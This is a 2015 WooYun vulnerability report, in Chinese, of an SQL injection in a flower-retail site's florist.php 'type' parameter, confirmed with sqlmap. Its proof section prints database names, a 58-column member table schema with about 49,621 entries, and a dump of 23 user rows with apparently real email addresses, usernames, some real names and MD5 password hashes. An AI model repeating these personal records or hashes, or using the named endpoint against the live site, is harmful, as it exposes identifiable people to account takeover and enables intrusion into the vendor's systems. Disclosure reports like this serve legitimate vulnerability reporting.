当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140825

漏洞标题:花集网SQL注入漏洞(涉及4w用户)

相关厂商:浙江花集网科技有限公司

漏洞作者: 憋屈

提交时间:2015-09-13 09:41

修复时间:2015-10-29 10:36

公开时间:2015-10-29 10:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-13: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商已经确认,细节仅向厂商公开
2015-09-24: 细节向核心白帽子及相关领域专家公开
2015-10-04: 细节向普通白帽子公开
2015-10-14: 细节向实习白帽子公开
2015-10-29: 细节向公众公开

简要描述:

详细说明:

http://xue.huaji.com/florist.php?type=5

h2.png


扔到sqlmap中跑

h1.png


漏洞证明:

available databases [18]:
[*] hj
[*] hj1
[*] hj2
[*] hj3
[*] hj4
[*] hj5
[*] hj6
[*] hj7
[*] hj8
[*] hj9
[*] hj_auction
[*] hj_market
[*] hj_office
[*] hwxbbs
[*] information_schema
[*] mysql
[*] seociku
[*] test
Database: hj
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 49621 |
+--------+---------+
Database: hj
Table: member
[58 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| activation | varchar(60) |
| address | varchar(256) |
| alipay_uid | varchar(60) |
| birthday | date |
| buyer_credit | float(8,0) |
| charges | decimal(6,2) |
| charges_status | tinyint(4) |
| checkbill_date | int(11) |
| chinese_city | varchar(32) |
| chinese_country | varchar(32) |
| chinese_province | varchar(32) |
| chinese_town | varchar(32) |
| city | varchar(8) |
| cnfee | decimal(6,2) |
| cost_ratio | decimal(6,2) |
| country | varchar(8) |
| credit_status | tinyint(4) |
| ctransfer_time | int(11) |
| default_feed | tinyint(4) |
| email | varchar(60) |
| expiry | int(11) |
| feed_config | text |
| gender | tinyint(4) |
| guider | varchar(20) |
| home_phone | varchar(60) |
| huaji_flag | tinyint(4) |
| id | int(11) |
| last_ip | varchar(15) |
| last_login | int(11) |
| mcredit | tinyint(4) |
| mobile_phone | varchar(60) |
| msn | varchar(60) |
| office_phone | varchar(60) |
| operator | varchar(50) |
| outer_id | int(11) |
| password | varchar(32) |
| portrait | varchar(256) |
| province | varchar(8) |
| ptemplate | tinyint(4) |
| qq | varchar(60) |
| qq_uid | varchar(100) |
| real_name | varchar(60) |
| reg_ip | varchar(15) |
| reg_time | int(11) |
| repayment_date | int(11) |
| repwd_code | varchar(32) |
| seller_credit | float(8,0) |
| sina_uid | int(11) |
| source_pwd | varchar(32) |
| store_id | int(11) |
| taobao_uid | int(11) |
| test | tinyint(4) |
| town | varchar(8) |
| ugrade | tinyint(4) |
| updatetime | int(11) unsigned |
| user_name | varchar(60) |
| visit_count | int(11) |
| zip | char(6) |
+------------------+------------------+
uid | groupid | memberid | email | status | groups | regdate | username | realname | password |
+-----+---------+----------+----------------------------+--------+---------+------------+--------------+----------+----------------------------------+
| 1 | 3 | 8 | 61333035@qq.com | 0 | <blank> | 1369383714 | admin | <blank> | 992fb043f5fa60c1914baf4e0bf1d247 |
| 2 | 3 | 10 | yushui518@163.com | 0 | <blank> | 1369455719 | yushui | 俞水 | d2d70460e02f0dbeb5140fd6399dead1 |
| 3 | 16 | 8 | xlj@fomdas.com | 0 | <blank> | 1369455739 | xulinjun | <blank> | 17342904f802fdb7f8d91de9e855ec44 |
| 4 | 16 | 10 | szh@fomdas.com | 0 | <blank> | 1369455853 | shaozhouhang | <blank> | f93f69e61211ad174b12f11b4b13730b |
| 5 | 16 | 13 | guancaihong@fomdas.com | 0 | <blank> | 1369455873 | guancaihong | <blank> | 9844f7babc72a4c2ad3e85f0f5c800d2 |
| 6 | 16 | 8 | wangxiwei@fomdas.com | 0 | <blank> | 1369455893 | wangxiwei | <blank> | 3e630aa21cbb161c73604bb8d2752991 |
| 7 | 16 | 10 | guoquan@ourbloom.com | 0 | <blank> | 1369455911 | guoquan | kaku | be7e8ec12376c33dd7afc3e7678aacca |
| 8 | 16 | 13 | zhaolei@fomdas.com | 0 | <blank> | 1369455926 | zhaolei | <blank> | 62e9c17130d2a7cefd482fcc92f8d4d1 |
| 9 | 16 | 8 | chentianyao@fomdas.com | 0 | <blank> | 1369455945 | chentianyao | <blank> | 6a8ce26404f33ea605ab4b973eb57631 |
| 10 | 16 | 8 | zhouxiaoxing@fomdas.com | 0 | <blank> | 1369455961 | zhouxiaoxing | <blank> | b7c71d072f131caae6aebbf46c04e8ad |
| 11 | 16 | 8 | chenyaowen@fomdas.com | 0 | <blank> | 1369455976 | chenyaowen | <blank> | 287986aa0840360302798fe34446de0f |
| 12 | 16 | 8 | linnanjun@fomdas.com | 0 | <blank> | 1369455990 | linnanjun | <blank> | 649a7077a05ccdb180f7ecfef64954f4 |
| 13 | 16 | 8 | nagashimah@ns.aucnet.co.jp | 0 | <blank> | 1369456063 | nagashimah | <blank> | eb442f21ed1513846e2193dd982583eb |
| 14 | 16 | 8 | ozakis@ns.aucnet.co.jp | 0 | <blank> | 1369456092 | ozakis | <blank> | 36a78baeb3974fc2c7860410ec450fe7 |
| 15 | 16 | 8 | amanoy@ns.aucnet.co.jp | 0 | <blank> | 1369456124 | amanoy | <blank> | f5eb5adcea0ce2fadf127fa91d0c0311 |
| 16 | 16 | 8 | iijimaj@ns.aucnet.co.jp | 0 | <blank> | 1369456145 | iijimaj | <blank> | c194e65970146aa240f3e60016a46ddd |
| 17 | 16 | 9 | mochizukiy@ns.aucnet.co.jp | 0 | <blank> | 1369456165 | mochizukiy | <blank> | e2c89827cc166e59961ac335ae627afe |
| 18 | 16 | 8 | araih@ns.aucnet.co.jp | 0 | <blank> | 1369456206 | araih | <blank> | 8e278f00d69fe8cbb724c75be46f92cc |
| 19 | 16 | 8 | sanoh@ns.aucnet.co.jp | 0 | <blank> | 1369456225 | sanoh | <blank> | f32f21925697050ff144e375f4dc280b |
| 20 | 16 | 8 | hojot@ns.aucnet.co.jp | 0 | <blank> | 1369456242 | hojot | <blank> | 211a51c95ff1c083e533dc6e31803e5e |
| 21 | 16 | 8 | sugimotoi@ns.aucnet.co.jp | 0 | <blank> | 1369456261 | sugimotoi | <blank> | 13e2009d11633b2cb552fa7774c0ff96 |
| 22 | 16 | 8 | shatakey@act-x.co.jp | 0 | <blank> | 1369456292 | shatakey | <blank> | eabd066047a123eee7d2e8296d4173b6 |
| 23 | 16 | 8 | hanazuka@act-x.co.jp | 0 | <blank> | 1369456310 | hanazuka | <blank> | 6abef99affeb471221b32408267caad5 |

修复方案:

版权声明:转载请注明来源 憋屈@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-14 10:35

厂商回复:

已确认此漏洞,谢谢~

最新状态:

暂无


漏洞评价:

评论